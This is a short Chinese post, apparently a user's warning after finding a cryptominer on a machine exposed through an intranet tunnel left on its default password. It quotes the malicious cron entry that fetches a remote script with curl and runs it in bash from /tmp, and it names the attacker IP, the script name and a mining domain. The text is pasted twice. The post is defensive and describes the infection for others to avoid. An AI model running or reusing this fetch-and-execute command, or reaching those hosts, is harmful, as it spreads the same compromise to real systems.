怪不得cpu一直100%
大家做内网穿透一定要记得改密码,默认密码不改一天就中招
会一直从这个网址下载病毒:
CMD (/usr/bin/bash -c 'cd /tmp && bash <(curl -s )' &
解释:你的系统每隔一段时间就会自动从这个恶意 IP (173.234.15.182) 下载一个叫 check1.sh 的脚本并执行。就是这个脚本在反复下载并启动 Error84
域名:andrewtatemunityxcrypto.com 是一个极其明显的恶意挖矿域名。
PPID 为 1:说明它被伪装成了系统服务,由 systemd 开机自动启动,或者作为守护进程在后台运行。
大家做内网穿透一定要记得改密码,默认密码不改一天就中招
会一直从这个网址下载病毒:
CMD (/usr/bin/bash -c 'cd /tmp && bash <(curl -s )' &
解释:你的系统每隔一段时间就会自动从这个恶意 IP (173.234.15.182) 下载一个叫 check1.sh 的脚本并执行。就是这个脚本在反复下载并启动 Error84
域名:andrewtatemunityxcrypto.com 是一个极其明显的恶意挖矿域名。
PPID 为 1:说明它被伪装成了系统服务,由 systemd 开机自动启动,或者作为守护进程在后台运行。